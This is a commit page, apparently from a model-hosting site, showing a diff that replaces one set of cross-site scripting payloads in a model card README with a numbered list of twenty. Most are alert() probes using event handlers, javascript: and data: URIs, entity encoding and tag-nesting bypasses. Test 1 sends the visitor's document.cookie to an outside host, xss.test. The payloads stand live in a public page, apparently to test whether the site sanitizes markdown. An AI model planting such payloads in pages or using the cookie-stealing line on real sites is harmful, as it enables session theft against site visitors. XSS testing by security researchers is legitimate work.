FIRSTACCOUNT69 commited on
Commit
f5139fc
·
verified ·
1 Parent(s): df27948

Add XSS test payloads

Browse files
Files changed (1) hide show
  1. README.md +58 -13
README.md CHANGED
@@ -1,26 +1,71 @@
1
  ---
2
- tags:
3
- - test
4
  license: mit
5
  ---
6
- # Test Model
7
 
8
- [Click me](javascript:alert(1))
9
 
10
- ![img](x onerror=alert(1))
11
 
12
- <details><summary>Click</summary><img src=x onerror=alert(document.domain)></details>
 
13
 
14
- <iframe src="javascript:alert(1)">
 
15
 
16
- <a href="javascript:alert(1)">xss link</a>
 
 
 
 
17
 
18
- [link](data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==)
 
19
 
20
- <div onmouseover="alert(1)">Hover me</div>
 
21
 
22
- <svg onload="alert(1)">
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
23
 
24
- <math><mtext><table><mglyph><style><!--</style><img src=x onerror=alert(1)>
 
25
 
26
- <input onfocus=alert(1) autofocus>
 
 
1
  ---
 
 
2
  license: mit
3
  ---
4
+ # XSS Test Model
5
 
6
+ ## Normal content first
7
 
8
+ This is a test model with various XSS payloads embedded.
9
 
10
+ ## Test 1: Image onerror
11
+ <img src=x onerror="fetch('https://xss.test/'+document.cookie)">
12
 
13
+ ## Test 2: SVG onload
14
+ <svg onload="alert(1)">
15
 
16
+ ## Test 3: Details/Summary
17
+ <details open ontoggle="alert('details')">
18
+ <summary>Click</summary>
19
+ test
20
+ </details>
21
 
22
+ ## Test 4: Math tag
23
+ <math><mi xlink:href="javascript:alert(1)">test</mi></math>
24
 
25
+ ## Test 5: Video
26
+ <video src=x onerror="alert('video')">
27
 
28
+ ## Test 6: Marquee
29
+ <marquee onstart="alert('marquee')">test</marquee>
30
+
31
+ ## Test 7: Input autofocus
32
+ <input autofocus onfocus="alert('input')">
33
+
34
+ ## Test 8: Body
35
+ <body onload="alert('body')">
36
+
37
+ ## Test 9: iframe srcdoc
38
+ <iframe srcdoc="<script>alert('iframe')</script>">
39
+
40
+ ## Test 10: Object data
41
+ <object data="javascript:alert('object')">
42
+
43
+ ## Test 11: Link tag
44
+ <link rel="import" href="data:text/html,<script>alert('link')</script>">
45
+
46
+ ## Test 12: Style injection
47
+ <div style="background:url('javascript:alert(1)')">styled</div>
48
+
49
+ ## Test 13: Custom element
50
+ <custom-tag onmouseover="alert('custom')">hover me</custom-tag>
51
+
52
+ ## Test 14: Anchor with JS
53
+ [Click me](javascript:alert('anchor'))
54
+
55
+ ## Test 15: Markdown image with JS
56
+ ![alt](javascript:alert('mdimg'))
57
+
58
+ ## Test 16: HTML entity bypass
59
+ <img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>
60
+
61
+ ## Test 17: Data URI
62
+ <a href="data:text/html,<script>alert(1)</script>">data uri</a>
63
+
64
+ ## Test 18: Form action
65
+ <form action="javascript:alert('form')"><button>Submit</button></form>
66
 
67
+ ## Test 19: Meta refresh
68
+ <meta http-equiv="refresh" content="0;url=javascript:alert('meta')">
69
 
70
+ ## Test 20: Template
71
+ <template><script>alert('template')</script></template>